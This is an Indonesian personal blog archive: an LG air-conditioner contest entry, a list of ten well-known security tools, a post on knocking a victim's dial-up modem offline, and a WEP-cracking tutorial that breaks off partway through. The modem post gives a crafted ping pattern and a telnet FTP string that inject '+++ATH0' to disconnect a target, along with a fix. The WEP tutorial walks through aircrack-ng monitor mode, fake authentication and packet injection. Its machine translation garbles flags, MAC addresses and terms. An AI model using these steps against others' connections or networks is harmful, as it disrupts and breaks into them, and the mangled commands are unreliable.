Selasa, 03 April 2012

Solusi untuk hidup sehat dengan memilih pendingin ruangan yang berkualitas dan sesuai dengan kebutuhan anda.

"Mendapatkan udara dingin dan menyegarkan" yapsssss itulah kata2 yang di inginkankan setiap orang dimanapun kita berada..dengan udara yang kian hari kian panas semua orang ingin rasanya mencari cara untuk menyejukkan tubuh. Nah Menghidupkan AC adalah solusinya.tentu saja dengan menggunakan AC kita dapat menikmati udara yang dingin dan menyegarkan.
mengingat di zaman yang serba canggih ini AC bukan lagi barang yang mewah untuk kalangan yang mampu (saya gak mampu :P jadi gk bisa beli ne AC).tapi sayangnya pemakaian AC Mulai di kurangi. kenapa begitu masbro.?
gak lain dan gak asing tentu saja alasannya karna ingin menurunkan tagihan listrik dan menghemat energi.
yapsss mungkin kita beranggap itu sebuah alasan yang kongkrit...
di samping itu Pemanasan global (GLOBAL WARMING) pada saat ini mengakibatkan beberapa dampak, salah satunya adalah tingginya temperatur di atmosfir melebihi 350 C, yang mana menyebabkan suhu udara menjadi lebih panas baik di kota maupun di desa dibandingkan dengan waktu terdahulu sebelum pemanasan global terjadi. Udara sejuk.pada saat ini lah AC sangat dibutuhkan untuk kenyamanan di dalam ruangan.
Menggunakan penyejuk udara (AC) memang terasa nikmat, apalagi kalau suasana di luar ruangan begitu panas. Namun suhu udara terlalu dingin yang menerpa tubuh dalam jangka waktu yang lama dapat mengakibatkan dampak buruk diantaranya adalah :
1. Semburan udara dari AC bisa mengakibatkan akumulasi karbon dioksida ke dalam ruangan. Akibatnya, kepala bisa pusing dan tubuh kurang bersemangat.
2. Penggunaan AC juga bisa menyebabkan masalah kekeringan kulit.
3. AC dengan suhu dingin bisa membuat leher kaku (tortikolis). Penderita penyakit ini merasa lehernya kaku, tidak bisa menengok ke satu sisi, serta nyeri bila dipaksakan bergerak.
Nah sekaranglah saat nya kita berfikir kritis untuk menentukan Ac yang terbaik bagi kesehatan dan kenyamanan anda di dalam ruangan.kini, banyak produk-produk AC yang menawarkan berbagai macam fitur tambahan yang berguna untuk kesehatan. salah satunya pilihlah AC yang memiliki fitur mampu membasmi kuman.bahkan, ada juga yang mampu menyaring partikel debu yang sangat halus termasuk bakteri. selain itu, ada pula AC yang menawarkan fitur menghilangkan bau taksedap seperti bau asap rokok serta fitur vitamin C filter yang mengandung antioksidan untuk meningkatkan kekebalan tubuh agar tubuh menjadi lebih sehat dan segar.
sekarang Muncul pertanyaan AC seperti apa yang baik dan hemat energi yang sebaiknya kita gunakan Masbro?
PT. LG Electronics menjawab kebutuhan Anda dimana saat ini LG telah meluncurkan Teknologi AC yang sangat sesuai dengan Kebutuhan kita yaitu LG SKIN CARE, DELUXE INVERTER V.
kenapa harus LG SKIN CARE, DELUXE INVERTER V sih om..?
okok ane jelasin sedikit mengenai keunggulan & pentingnya menggunakan Product LG SKIN CARE, DELUXE INVERTER V ini.
LG Skin Care, Deluxe Inverter V merupakan penyejuk udara terbaru dari Perusahann LG yang tidak hanya memberikan desain terbaik, tetapi juga memiliki paket solusi penyejuk udara terlengkap dan tiada bandingnya seperti teknologi ion Plasmaster yang dapat merawat kulit, dan dapat mensterilkan udara dari kuman-kuman hingga 99,9%, suara yang lebih tenang serta hemat energi. Tidak itu saja Product-product dari  LG ini sudah tidak di ragukan lagi dan Teknologi AC DELUXE INVERTER ini sudah sangat di percayai oleh semua kalangan masyarakat yang dapat mengurangi pemakaian daya listrik khususnya pada pendingin ruangan inverter. Tak tanggung-tanggung masbro.. Perusahaan LG ini mengklaim pengembangan teknologi Inverter-nya ini mampu menghasilkan penghematan daya listrik hingga 60% berbanding dengan perangkat pendingin udara konvensional. wow LUAR BIASA PEMIRSA. AMAZING..AMAZING..( korban tukul  kwkwkkw ).

Bagaimana masbro sudah cukup jelas dan tidak di ragukan lagi bukan..? makanya gak salah lagi kalo  Solusi Untuk Hidup Yang Lebih Baik menjadi Slogan Pendingin ruangan ini.
Dari permasalahan permasalahan diatas dapat di simpulkan bahwa LG SKIN CARE, DELUXE INVERTER V adalah SOLUSI MENDAPATKAN UDARA DINGIN & MENYEGARKAN untuk kesehatan keluarga anda.
jadi tunggu apa lagi ?? sudah saatnya Ganti AC yang lebih berkualitas dan sesuai dengan kebutuhan kita masbro. ^_^
saya pribadi juga pengen sih menggunakan AC yang berkualitas ini apalagi saya tinggal Di kota MEDAN yang suhu Panasnya Na'ujubillah ini..tapi mengingat kondisi Ekonomi tidak mengizinkan saya untuk menggunakan product pendingin ruangan ini ya terpaksalah di rumah pakai Kipas angin.
hehehehhe..tapi mudah2an aja dengan adanya contest blogger yang di selenggarakan oleh "LG SKIN CARE BLOG CONTEST 2012" ini saya terpilih sebagai peserta yang beruntung mendapatkan LG AC SKIN CARE DELUXE Inverter V tersebut..aminnnnnn(pray)
(ngarepp) ahahhahahah...

Sabtu, 10 Maret 2012

10 Tool Favorit Hacker

Pembuat NMAP telah melakukan survei terhadap 100 tools favorit hacker kepada pengikut di milis nmap-hackers. ada Sekitar 3,243 user memberikan jawaban mereka pada voting tool hacker favorit. 100 tool favorit hacker dapat dilihat pada situs www.insecured.org
Berikut ini akan saya tuliskan 10 tools favorit hacker yang mendapatkan suara terbanyak, survei ini diambil pada tahun 2006.
1.Nessus
tool ini diciptakan kurang lebih di tahun 1998 dan kemudian disebarluaskan secara bebas. Nessus merupakan sebuah aplikasi untuk mencari celah keamanan di sebuah sistem komputer. Menurut situs resmi dari tools ini yang ada di www.nessus.org, tool tersebut sudah banyak digunakan oleh para hacker dan banyak perusahaan yang ada di dunia.
2.Snort
Snort bisa dibilang merupakan sebuah IDS, IDS adalah sebuah tool untuk mencegah dan mendeteksi suatu serangan pada sistem komputer. Apabila Anda berminat untuk mencoba tools ini, anda bisa mendownloadnya di www.snort.org.
3.Kismet
Kismet merupakan suatu tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , dan tools ini juga dapat menangkap paket pada suatu sistem jaringan dan menjadi suatu IDS (intrusion detection System).
Untuk informasi lebih lanjut tentang kismet, anda bisa melihatnya pada situs resmi nya di http://www.kismetwireless.net atau anda juga bisa masuk ke #kismet irc.freenode.net.
4.Metasploit Framework
Metasploit Framework merupakan suatu proyek open source . Tools ini Diciptakan menggunakan bahasa Perl dan tools ini terdiri dari komponen pelengkap dan telah dicompile menggunakan bahasa C, assembler dan Python. Tools ini bisa bekerja di sistem operasi UNIX, Linux dan juga Windows. untuk informasi lebih lanjut dapat dilihat pada situs http://www.metasploit.com.
5.Netcat
Netcat merupakan suatu tool networking utility yang bisa membaca dan juga menuliskan data yang ada pada suatu koneksi dalam suatu jaringan dengan melalui protokol TCP/IP.
Beberapa Fitur yang ada di Netcat adalah :
» Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter pada suatu jaringan
» Port scanner, fitur ini berfungsi untuk mendeteksi port yang sedang terbuka.
» Buffered send-mode dan hexdump RFC854 telnet.
6.Hping
DenganTool tersebut kita dapat menguji kemampuan sebuah firewall, dan juga mencari port yang sedang terbuka, kita juga dapat menguji keamanan pada suatu jaringan dengan menggunakan beragam jenis protokol, dan juga kita dapat memperoleh informasi sistem operasi, dan mengevaluasi protokol TCP/IP.
7.TCPDump
Admin pada jaringan yang menggunakan tool ini dapat melakukan monitor lalu lintas dan juga menganalisa suatu permasalahan apabila sedang terjadi gangguan. Tcpdump digunakan untuk meng-capture data(BPF / BSD Packet Filter). BPF akan menerima sebuah salinan dari driver pengirim dan juga penerima paket.
8. John The Ripper
Sebuah password cracker yang sudah ada sejak lama dan selalu menjadi tools favorit hacker .
9. Cain And Abel
Dengan Tool ini kita bisa mengumpulkan password menggunakan suatu metode yang disebut dengan network sniffing, dengan tools ini kita dapat melakukan cracking password, Brute-Force and juga Cryptanalysis attacks, merekam suatu pembicaraan yang menggunakan VoIP, cracking suatu jaringan wireless, dan juga menganalisa suatu trafik pada sebuah jaringan. www.oxid.it
10. WireShark / Ethereal
tool ini dapat kita gunakan untuk menganalisa protokol jaringan. dapat berfungsi menjadi sebuah sniffer. dengan tool ini kita juga dapat Memantau lalu lintas yang ada di internet.
sumber:/hasiaulia.net

Jumat, 13 Januari 2012

AstaMedia Blogging School Solusi Untuk meraih kesuksesan Anda di Binis Online


Bisnis online..?
mungkin kita sudah tidak asing lagi dengan kata-kata tersebut..
yapss... bisnis online tersebut sudah makin marak di era informatika saat ini..
apalagi kita seorang pengguna dunia maya setiap website yang kita kunjungi hampir rata-rata isi Website/Blog mereka di penuhi dengan penjualan produk-produk barang yang mereka jadikan sebagai lahan bisnis mereka melalui Online.Bahkan yang lebih menariknya lagi dengan membuka Usaha melalui bisnis Online tersebut mereka bisa mendapatkan penghasilan yang cukup besar perbulannya dengan hanya bermodalkan surfing tanpa harus memeras keringat dan mengocek kantong yang banyak ..
Dibandingkan dengan Bisnis di Dunia nyata kita harus menanam modal yang banyak dan yang lebih rumitnya kita harus membuat Browser atau juga mempekerjakan seorang untuk menyebarkan Iklan-iklan atau Produk-produk yang ingin kita pasarkan..Bukankah itu membuang-buang waktu anda.??? mungkin anda pernah mendengar Pepatah mengatakan "TIME IS MONEY" waktu adalah uang..
OK Not Problem.. Semua kan tergantung kita yang menilai. Tapi bagi saya Pribadi Mungkin Bisnis Online lah Solusi Terbaik untuk anda meraih kesuksesan di Dunia BISNIS..!!
Nah Bagaimana Tertarikah Anda Untuk  Memulai Karir anda dari sekarang dengan memanfaat Media Bisnis Online .?
#sedikit hipnotisan #coba anda tatap mata saya..dalam hitungan ketiga .1....2.....3....anda tertidur dan coba anda bayangkan dari sekarang Kapan lagi anda Manfaatkan Kesempatan Emas ini untuk mulai memperbaiki karir anda dengan berbisnis Online..?? Nah trus coba anda bayangkan di zaman sekarang khususnya di Indonesia saat ini Lapangan kerja sangatlah minim..bahkan seorang Sarjana saja tidak mampu mendapatkan pekerjaan.apalagi seandainya saja anda seorang tamatan jenjang SMA atau pun tidak tamat Sekolah..waduh apa kata dunia? apakah kita maw terus menambah jumlah pengangguran di negara ini.?



untuk contoh nyata nya saja saya sendiri sekarang ini saya masih duduk di bangku pendidikan.sebagai salah seorang mahasiswa jurusan teknik informatika komputer di salah satu STMIK di kota medan. saya sudah mempunyai penghasilan sendiri dengan membuka bisnis Online tersebut..
saya mengelola web dan blog saya untuk mendapatkan hasil tersebut dengan memasang iklan-iklan dari sebuah advertising.tidak itu saja..saya juga menawarkan jasa pembuatan Blog.
ne bukti kongkrit penghasilan saya dari sebuah advertising dan blog yang sudah saya buat.





Ingat masbro..Kunci Kesukesan ada pada diri kita..tanpa berusaha apa mungkin kita bisa meraih kesuksesan tersebut..? hihihihiih

Nah sekarang muncul pertanyaan..
terus apa Solusi yang terbaik untuk mengatasi Problem tersebut ..?
yapzzz...pertanyaan yang sangat bagus..
anda buat aja blog untuk bisnis Online Sekarang juga..
gampangkan jawabannya..
hihihihi..
trus bagaimana cara untuk membuatnya..? mungkin itu yg muncul dalam pikiran anda kan,? apalagi kita belum paham betul untuk mengolahnya menjadi Blog yang bermanfaat dan banyak dikunjungi pastinya..

nahh tidak usah khawatir...saat ini sudah ada sekolah blog yang menyediakan khusus untuk anda pemula-pemula yang ingin memulai karirnya di dunia bisnis yaitu ASTAMEDIA BLOGGING SCHOOL.Sekolah blog yang beralamat

AstaMedia Group

Jl. Tamalanrea Raya Blok A22

Kompleks Bumi Tamalanrea Permai (BTP) Makassar

Tel. 0411. 590830 and 0411. 5766897

anda bisa lihat video yang saya lampirkan dibawah yang memuat tentang Sekolah Blog tersebut.



Nah tidak ada salahnya kan untuk belajar itu semua.astamedia blogging mungkin Jawaban yang tepat bagi anda untuk memulai anda meraih keuntungan besar dari bisnis online.Astamedia Blogging School merupakan Sekolah Blog pertama di Asia.Sejak diluncurkan pada bulan Maret 2009 hingga saat ini telah mencetak puluhan bahkan ratusan alumni. Saat ini sudah angkatan ke XXII yang belajar di Astamedia Blogging School.Anda bisa memulainya dengan Sekolah Blog tersebut dan memilih program yang memenuhi sesuai dengan kebutuhan anda.



sekarang anda yang menentukan apakah anda mau mengambil kesempatan emas ini atau mengabaikannya begitu saja..?
Begitu pula dengan meraih kesempatan anda untuk meraih kesuksesan.Jika Anda benar-benar mau mendalami bisnis tersebut, melakukannya dengan sungguh-sungguh,tidak mudah menyerah, fokus pada bisnis Anda, yakinlah bahwa sukses sangat dekat dengan Anda. Tinggal Anda mau mewujudkannya atau tidak.

Sesungguhnya Kunci Kesuksesan ada Pada diri kita..!!!

Jumat, 09 Desember 2011

TEKNIK DISCONNECT KAN MODEM LAWAN !!!

Betapa mudahnya melakukan koneksi ke Internet dengan modem, tinggal membuat koneksi dengan wizard, klik connect dan selesailah semuanya. Di balik semua kemudahan ini, pernahkan terpikirkan bagaimana komputer berkomunikasi dengan modem ?
Agar Anda lebih memahaminya, klik tombol Start i) Control Panel [> Phone and Modem Options [>Modems [> Pilih modem yang Anda gunakan [> Properties  

Pada form properties modem, klik tombol Query Modem(l). Perhatikan pada kolom Command dan Response (2), yang memperlihatkan karakter-karakter aneh. Jika diperhatikan, perintah atau command semuanya dimulai dengan huruf AT, karena itulah seringkali perintah-perintah ke modem sering disebut sebagai "perintah AT". Perintah AT ini mengikuti standard Hayes yang hampir digunakan oleh semua modem (bahkan saya tidak mampu memberikan contoh modem yang tidak menggunakannya).
Dalam perintah AT yang juga bisa Anda lakukan secara manual melalui HyperTerminal, untuk melakukan dial ke suatu nomor, digunakan perintah ATDT atau ATDP. Misalkan saat Anda melakukan koneksi ke Internet dengan nomor telepon 080989999, maka sebenarnya yang dilakukan secara internal adalah penggunaan perintah ATDT 080989999 atau ATDP 080989999.
Modem yang mendapatkan perintah ini akan segera melakukan dial ke Telkomnet. AT bisa diartikan meminta perhatian (ATtention) dari modem, sedangkan DT artinya Dial by Tone dan DP artinya Dial by Pulse.
Ketika modem dalam keadaan online, perintah AT tidak bisa diberikan kepada modem karena perintah-perintah AT yang Anda berikan akan dianggap sebagai data untuk ditransfer.
Lalu bagaimana memerintahkan modem untuk melakukan disconnect ? Pertanyaan bagus! Komputer akan mengirimkan kode +++ yang berarti meminta modem merubah modus pengiriman data menjadi modus perintah. Kode +++ yang juga disebut sebagai escape characters ini memungkinkan kita memberikan perintah ATH0 yang akan memerintahkan modem untuk segera melakukan disconnect (+++ATH0).
Kini sampailah pada bagian yang menyenangkan. Ternyata dengan mengirimkan data +++ATH0 ke komputer korban dengan modem yang bermasalah,
data tersebut akan diterjemahkan menjadi perintah untuk memutuskan koneksi!. Pengiriman data ini bisa dilakukan dengan berbagai cara seperti melalui ping (hanya untuk keluarga linux) :
[root@lct root]* ping -p 2b2b2b415448300d -c 5 202.152.0.2
PATTERN: 0x2b2b2b415448300d
PING 202.152.0.2 (202.152.0.2) : 56 data bytes – 202.152.0.2 ping statistics -
5 packets transmitted, 0 packets received, 100% packet loss [root@narf ath0]#
Terlihat bahwa setelah menjalankan perintah ping yang berisi data +++athO, komputer korban tidak memberikan respon yang besar kemungkinan komputer korban telah disconnect.
Tentu saja cara ini juga bisa memberikan efek terhadap diri Anda sendiri jika menggunakan modem yang bermasalah, artinya justru Andalah yang pertama akan mendapatkan disconnect.
Bagaimana dengan pengguna windows ? masih terdapat berbagai cara seperti melalui telnet ke komputer korban (tentu saja jika komputer korban menjalankan ftp server) :
C:\>telnet 202.152.0.2
Trying 192.168.1.1.. .Connected to 192.168.1.1. Escape character is ,A]’.
220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri
Dec 12
20:41:
USER +++ATH0 A]
telnet> close Connection closed.
Bagi pengguna windows, cara yang paling mudah adalah menggunakan program yang telah dibuat oleh Misoskian . Anda tinggal menjalankan program ini dan memasukkan alamat 1P komputer korban. Program yang diberi nama ROCKET (Gambar 20-2) ini berjalan sangat bagus dan sangat mudah penggunaannya.

Saya tidak mengetahui secara jelas siapakah penemu masalah ini, tapi yang jelas masalah yang sudah hampir berumur 5 tahun ini sampai saat ini masih terus berlanjut. Notebook yang saya gunakan saat ini, yang dibeli pada tahun 2002, Toshiba, Pentium 1.1 Ghz masih bermasalah untuk kelemahan ini. Akibatnya ? jika saya sedang menggunakan modem, dan ada yang melakukan penyerangan semacam ini, maka modem saya akan langsung disconnect.
Bagaimana menyelesaikan masalah ini agar kita tidak menjadi target atau bulan-bulanan orang iseng ? Adrian Gonzalez menyarankan Anda untuk merubah string S2 menjadi 255.
Perintah untuk merubah string S2 ini selengkapnya adalah ATS2=255. Perubahan ini bisa dilakukan melalui HyperTerminal (Start [> Programs i>Accessories [> Communications i> HyperTerminal).
 Gambar 2. Koneksi ke modem dengan Hyperterminal
Melalui HyperTerminal (Gambar 3), Anda bisa memasukkan perintah untuk merubah isi S2 menjadi 255.
Warna abu-abu adalah apa yang saya ketikkan melalui keyboard sedangkan yang warna hitam adalah respon yang ditampilkan oleh komputer. Perlu diperhatikan bahwa perintah-perintah yang saya ketikkan sebenarnya tidaklah kelihatan pada layar monitor (karena local echo tidak diaktifkan). Perhatikan perintah-perintah yang digunakan:
  1. Saya mengetikkan perintah AT dan menekan enter. Modem memberikan respon OK.
  2. Saya mengetikkan perintah ATS2? Untuk mengetahui nilai S2 saat ini. Modem menjawab nilainya 043
  3. Saya mengetikkan perintah ATS2 = 255 yang berarti memasukkan nilai 255 ke S2. Modem menjawab OK yang artinya perintah telah dijalankan dengan baik
  4. Saya mengetikkan perintah ATS2? Dan menekan enter untuk mengetahui nilai S2 saat ini. Modem menjawab 255.
  5. Kini langkah selanjutnya, yang dilakukan haruslah merekam perubahan ini ke dalam modem. Perintah yang sering digunakan
adalah WOl. Sayang sekali, modem internal notebook yang saya miliki tidak ada dokumentasi sama sekali mengenai perintah AT ini dan perintah yang saya ketahui ternyata tidak berlaku.
Oleh karena itu, ketika saya disconnect dari HyperTerminal, nilai S2 akan kembali ke semula yaitu 043. Anda tentu mempunyai kasus yang berbeda dengan saya dan mungkin bisa melakukan perubahan permanen pada modem ini.
Cara lain yang bisa digunakan dan saya gunakan saat ini adalah menambah perintah tambahan ketika modem di-inisialisasi. Jadi sebelum modem digunakan, nilai string S2 akan diisi secara otomatis oleh sistem operasi menjadi 255.
 Gambar 4. Inilialisasi Modem 

Untuk menambah string inisialisasi ke dalam modem yar bermasalah, klik tombol Start [> Control Panel 0 Phone and Modem Options i> Modems 0> Pilih modem yang Anda gunakan [> Properties i> Advanced. Pada kolom “Extra initialization commands:” masukkan perintah ATS2=255.
Tidak semua modem mempunyai masalah seperti ini, karena itu Anda perlu memastikan apakah modem Anda perlu di rubah atau ditambahkan inialisasi ini.

Semoga bermanfaat untuk semua yg membutuhkan ini..

CARA HACK WEP DENGAN AIRCRACK !!!


 Pengenalan
Tutorial ini menuntun Anda meskipun kasus yang sangat sederhana untuk crack kunci WEP . Hal ini dimaksudkan untuk membangun keterampilan dasar Anda dan mendapatkan Anda akrab dengan konsep-konsep. Ini mengasumsikan Anda memiliki kartu nirkabel yang bekerja dengan driver yang sudah ditambal untuk injeksi.
Dianjurkan agar Anda melakukan percobaan dengan titik akses nirkabel rumah Anda untuk mendapatkan keyamanan &bebas dengan ide-ide dan teknik. Jika Anda tidak memiliki titik akses tertentu, ingatlah untuk mendapatkan izin dari pemilik sebelum bermain dengan itu.
Saya ingin mengakui dan berterima kasih kepada tim aircrack-ng untuk menghasilkan suatu alat yang kuat yang hebat.
Harap kirimi saya setiap umpan balik yang konstruktif, positif atau negatif. Ide-ide pemecahan masalah tambahan dan tips sangat welcome.
Asumsi
Pertama, solusi ini mengasumsikan:
  • Anda menggunakan driver ditambal untuk injeksi.
  • Anda secara fisik cukup dekat untuk mengirim dan menerima paket jalur akses. Ingatlah bahwa hanya karena Anda dapat menerima paket dari titik akses tidak berarti Anda mungkin akan dapat mengirimkan paket ke AP. Kekuatan kartu nirkabel biasanya kurang maka kekuatan AP. Jadi, Anda harus secara fisik cukup dekat untuk paket Anda dikirimkan untuk mencapai dan diterima oleh AP.
  • Ada setidaknya satu klien kabel atau nirkabel tersambung ke jaringan dan mereka aktif. Alasannya adalah bahwa tutorial ini tergantung pada menerima setidaknya satu paket permintaan ARP dan jika tidak ada klien aktif maka tidak akan ada paket permintaan ARP.
  • Anda menggunakan v0.9 dari aircrack-ng. Jika Anda menggunakan versi yang berbeda maka beberapa pilihan umum mungkin harus diubah.
Pastikan semua asumsi di atas adalah benar, jika tidak, nasihat yang berikut tidak akan bekerja. Dalam contoh di bawah, Anda akan perlu untuk mengubah “ath0″ dengan nama interface yang spesifik untuk kartu nirkabel Anda.
Peralatan yang digunakan
Dalam tutorial ini, peralatan yang digunakan adalah :
  • Alamat MAC dari PC suite menjalankan aircrack-ng: 0:00 F: B5: 88: AC: 82
  • BSSID (MAC alamat titik akses): 00:14:06 C: 7E: 40:80
  • ESSID (atau nama jaringan nirkabel): Lombok_Creck84
  • Jalur akses saluran: 9
  • Wireless interface: ath0
Anda harus mengumpulkan informasi yang setara untuk jaringan Anda akan bekerja pada. Kemudian hanya mengubah nilai dalam contoh di bawah ini ke jaringan tertentu.
Solusi
Ikhtisar Solusi
Untuk crack WEP kunci untuk jalur akses, kita perlu mengumpulkan banyak vektor inisialisasi (infus). Jaringan lalu lintas normal tidak biasanya menghasilkan ini IVs sangat cepat. Secara teoritis, jika kamu bersabar, Anda dapat mengumpulkan infus cukup untuk memecahkan WEP kunci dengan hanya mendengarkan lalu lintas jaringan dan menyimpan mereka. Karena tidak satupun dari kita yang sabar, kita menggunakan teknik yang disebut injeksi untuk mempercepat proses. Injeksi melibatkan memiliki titik akses (AP) mengirim ulang paket yang dipilih berulang sangat cepat. Hal ini memungkinkan kita untuk menangkap sejumlah besar infus dalam waktu singkat.
Setelah kami telah menangkap sejumlah besar infus, kita dapat menggunakannya untuk menentukan WEP kunci.
Berikut adalah langkah-langkah dasar kita akan pergi melalui:
  1. Jalankan interface nirkabel dalam mode monitor pada saluran AP tertentu
  2. Uji kemampuan injeksi perangkat nirkabel untuk AP
  3. Gunakan aireplay-ng untuk melakukan otentikasi palsu dengan jalur akses
  4. Mulai airodump-ng di AP saluran dengan BSSID filter untuk mengumpulkan infus unik baru
  5. Mulai aireplay-ng dalam modus memutar ulang permintaan ARP untuk menyuntikkan paket
  6. Jalankan aircrack-ng untuk memecahkan kunci menggunakan infus dikumpulkan
Langkah 1 – Jalankan interface nirkabel dalam mode monitor pada saluran AP
Tujuan dari langkah ini adalah untuk menempatkan kartu anda ke dalam apa yang disebut mode monitor. Mode monitor adalah mode dimana kartu Anda dapat mendengarkan setiap paket di udara. Biasanya kartu Anda hanya akan “mendengar” paket yang ditujukan kepada Anda. Dengan mendengar setiap paket, kita kemudian dapat memilih beberapa untuk injeksi. Selain itu, hanya (ada beberapa pengecualian jarang) mode monitor memungkinkan Anda untuk menyuntikkan paket. (Catatan:. Prosedur ini berbeda untuk non-Atheros kartu)
Pertama berhenti ath0 dengan memasukkan:
airmon-ng ath0 berhenti
Sistem merespon:
Antarmuka Chipset Atheros driver madwifi wifi0-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP hancur)
Masukkan “iwconfig” untuk memastikan tidak ada antarmuka athX lainnya.Seharusnya terlihat seperti ini:
lo ada ekstensi nirkabel. eth0 tidak ada ekstensi nirkabel. wifi0 tidak ada ekstensi nirkabel.
Jika ada interface athX tersisa, kemudian berhenti masing-masing. Ketika Anda selesai, jalankan “iwconfig” untuk memastikan ada yang tersisa satupun.
Sekarang, masukkan perintah berikut untuk memulai kartu nirkabel pada saluran 9 dalam mode monitor:
airmon-ng start wifi0 9
Pengganti nomor saluran yang berjalan pada AP Anda untuk “9″ pada perintah di atas. Hal ini penting. Anda harus memiliki kartu nirkabel Anda terkunci ke saluran AP untuk langkah-langkah berikut dalam tutorial ini untuk bekerja dengan benar.
Catatan: Dalam perintah ini kita menggunakan “wifi0″ bukan antarmuka nirkabel kami “ath0″. Hal ini karena driver madwifi-ng yang digunakan. Untuk pengemudi lain, gunakan nama antarmuka nirkabel. Contoh: “wlan0″ atau “rausb0″.
Sistem akan merespon:
Antarmuka Chipset Atheros driver madwifi wifi0-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Anda akan melihat bahwa “ath0″ dilaporkan di atas sebagai dimasukkan ke dalam mode monitor.
Untuk mengkonfirmasi antarmuka setup dengan benar, masukkan “iwconfig”.
Sistem akan merespon:
lo ada ekstensi nirkabel. wifi0 tidak ada ekstensi nirkabel. eth0 tidak ada ekstensi nirkabel. ath0 IEEE 802.11g ESSID: “” Nickname: “” Mode: Monitor Frequency: 2,452 GHz Access Point: F 00:00: B5: 88: AC: 82 Bit Rate: 0 kb / s Tx-Power: 18 dBm = 0 Sensitivitas / 3 Retry: off RTS thr: off Fragment thr: Enkripsi kunci dari: Manajemen Matikan: Link Kualitas off = 0 / 94 tingkat Sinyal =- 95 dBm Noise level =- 95 dBm Rx invalid nwid: 0 Rx invalid crypt: 0 Rx invalid frag: 0 Tx berlebihan retries: 0 Invalid misc: 0 Missed beacon: 0
Dalam tanggapan di atas, Anda dapat melihat bahwa ath0 dalam mode monitor, pada frekuensi 2.452GHz yang adalah saluran 9 dan Access Point menunjukkan alamat MAC dari kartu nirkabel Anda. Harap dicatat bahwa hanya madwifi-ng driver menunjukkan alamat MAC dari kartu nirkabel Anda, pembalap lain tidak melakukan hal ini. Jadi semuanya baik. Hal ini penting untuk memastikan semua informasi ini sebelum melanjutkan, jika langkah-langkah berikut tidak akan bekerja dengan baik.
Untuk mencocokkan frekuensi untuk saluran, check out:http://www.rflinx.com/help/calculations/ # 2.4ghz_wifi_channels kemudian pilih “Channel Seleksi Wifi dan Channel Tumpang tindih” tab. Ini akan memberi Anda frekuensi untuk setiap saluran.
Langkah 2 – Uji Perangkat Wireless Packet Injection
Tujuan dari langkah ini memastikan bahwa kartu Anda berada dalam jarak AP Anda dan dapat menyuntikkan paket untuk itu.
Masukkan:
aireplay-ng-e -9 boneka-C 00:14:06: 7E: 40:80 ath0
Dimana:
  • -9 Berarti injeksi tes
  • -E Lombok_Creck84 adalah nama jaringan nirkabel
  • -C 00:14:06: 7E: 40:80 adalah titik akses alamat MAC
  • ath0 adalah nama antarmuka nirkabel
Sistem harus merespon dengan:
09:23:35 Menunggu mercusuar bingkai (BSSID: 00:14:06 C: 7E: 40:80) di channel 9 09:23:35 siaran permintaan penyelidikan Mencoba … 09:23:35 Injeksi bekerja! 09:23:37 Ditemukan 1 AP 09:23:37 Mencoba permintaan penyelidikan diarahkan … 09:23:37 00:14:06 C: 7E: 40:80 – channel: 9 – ‘boneka’ 09:23:39 Ping (min / avg / max): 1.827ms/68.145ms/111.610ms Power: 33,73 09 : 30/30 23:39: 100%
Baris terakhir adalah penting. Idealnya itu harus mengatakan 100% atau persentase yang sangat tinggi. Jika rendah maka Anda terlalu jauh dari AP atau terlalu dekat. Jika nol maka injeksi tidak bekerja dan Anda perlu patch driver Anda atau menggunakan driver yang berbeda.
Langkah 3 – Mulai airodump-ng untuk menangkap infus
Tujuan dari langkah ini adalah untuk menangkap infus yang dihasilkan. Langkah ini dimulai airodump-ng untuk menangkap IVs dari titik akses tertentu.
Buka konsol sesi lain untuk menangkap infus yang dihasilkan. Kemudian masukkan:
airodump-ng-c 9 – BSSID 00:14:06 C: 7E: 40:80-w ath0 keluaran
Dimana:
  • -C 9 adalah saluran untuk jaringan nirkabel
  • - BSSID 00:14:06 C: 7E: 40:80 adalah titik akses alamat MAC. Hal ini menghilangkan lalu lintas asing.
  • -W capture awalan nama file untuk file yang akan berisi infus.
  • ath0 adalah nama antarmuka.
Sementara suntikan berlangsung (kemudian), layar akan terlihat seperti ini:
CH 9] [Berlalu: 8 mins] [2007/3/21 19:25 BSSID PWR Beacons # RXQ Data, # / s CH MB ENC ESSID cipher AUTH 00:14:06 C: 7E: 40:80 42 100 5240 1783 07 338 9 54   WEP  WEP          Lombok_Creck84  BSSID STATION PWR Hilang Probe Paket 00:14:06 C: 7E: 40:80 00:00 F: B5: 88: AC: 82 42 0 183.782
Langkah 4 - Gunakan aireplay-ng # untuk melakukan otentikasi palsu dengan jalur akses
Dalam rangka untuk jalur akses untuk menerima sebuah paket, sumber alamat MAC harus sudah terkait. Jika sumber alamat MAC Anda suntik tidak terkait maka AP mengabaikan paket tersebut dan mengirimkan sebuah "deauthentication" paket dalam cleartext. Dalam keadaan ini, tidak ada infus baru tercipta karena AP adalah mengabaikan semua paket disuntikkan.
Kurangnya hubungan dengan jalur akses adalah satu alasan terbesar mengapa injeksi gagal. Ingat aturan emas: MAC Anda gunakan untuk injeksi harus terkait dengan AP dengan baik menggunakan otentikasi palsu atau menggunakan MAC dari klien yang sudah terkait.
Untuk mengasosiasikan dengan jalur akses, menggunakan otentikasi palsu:
aireplay-ng -1 0-e teddy-C 00:14:06: 7E: 40:80-h 00:00 F: B5: 88: AC: 82 ath0
Dimana:
  • -1 Berarti otentikasi palsu
  • 0 reassociation waktu dalam hitungan detik
  • -E Lombok_Creck84 adalah nama jaringan nirkabel
  • -C 00:14:06: 7E: 40:80 adalah titik akses alamat MAC
  • -H F 00:00: B5: 88: AC: 82 adalah alamat MAC kartu kita
  • ath0 adalah nama antarmuka nirkabel
Sukses terlihat seperti:
18:18:20 Otentikasi Mengirim Permintaan 18:18:20 18:18:20 Otentikasi berhasil Mengirim Permintaan 18:18:20 Asosiasi Asosiasi sukses :-)
Atau variasi lain untuk jalur akses pemilih:
aireplay-ng -1 6000-o 1-q 10-e teddy-C 00:14:06: 7E: 40:80-h 00:00 F: B5: 88: AC: 82 ath0
Dimana:
  • 6000 - Reauthenticate setiap detik 6000. Periode panjang juga menyebabkan tetap hidup paket akan dikirim.
